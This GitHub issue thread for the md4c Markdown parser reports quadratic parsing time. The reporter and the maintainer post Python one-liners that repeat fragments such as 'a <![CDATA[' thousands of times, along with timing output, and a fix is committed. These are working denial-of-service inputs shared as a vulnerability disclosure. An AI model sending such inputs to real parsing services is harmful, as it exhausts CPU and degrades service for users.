Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Quadratic behaviour on pathological html #73

Closed
marcusklaas opened this issue Apr 29, 2019 · 3 comments

Comments

@marcusklaas
Copy link

commented Apr 29, 2019

Found this vulnerability in pulldown-cmark. It appears md4c is also vulnerable.

python -c 'print("a <![CDATA[" * 10000)' | time md2html/md2html > /dev/null
0.38user 0.00system 0:00.39elapsed 95%CPU (0avgtext+0avgdata 2688maxresident)k

python -c 'print("a <![CDATA[" * 20000)' | time md2html/md2html > /dev/null
1.49user 0.00system 0:01.51elapsed 98%CPU (0avgtext+0avgdata 4204maxresident)k

python -c 'print("a <![CDATA[" * 40000)' | time md2html/md2html > /dev/null
5.96user 0.00system 0:05.99elapsed 99%CPU (0avgtext+0avgdata 7016maxresident)k
@mity

This comment has been minimized.

Copy link
Owner

commented Apr 29, 2019

Ack.

Seems to be also the case for repetitions of a <?

$ time python -c 'print("a <? " * 10000)' | ./md2html/md2html >/dev/null
real    0m0.615s
user    0m0.015s
sys     0m0.031s

$ time python -c 'print("a <? " * 20000)' | ./md2html/md2html >/dev/null
real    0m2.227s
user    0m0.000s
sys     0m0.046s
@mity

This comment has been minimized.

Copy link
Owner

commented Apr 29, 2019

And repetitions of a <!A:

$ time python -c 'print("a <!A" * 10000)' | ./md2html/md2html >/dev/null
real    0m0.529s
user    0m0.000s
sys     0m0.062s

$ time python -c 'print("a <!A" * 20000)' | ./md2html/md2html >/dev/null
real    0m1.890s
user    0m0.015s
sys     0m0.015s

$ time python -c 'print("a <!A" * 30000)' | ./md2html/md2html >/dev/null
real    0m4.169s
user    0m0.000s
sys     0m0.030s

@mity mity closed this in d4d1091 Apr 29, 2019

@marcusklaas

This comment has been minimized.

Copy link
Author

commented Apr 29, 2019

Amazed by the lightning speed turnaround on this! 👀

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.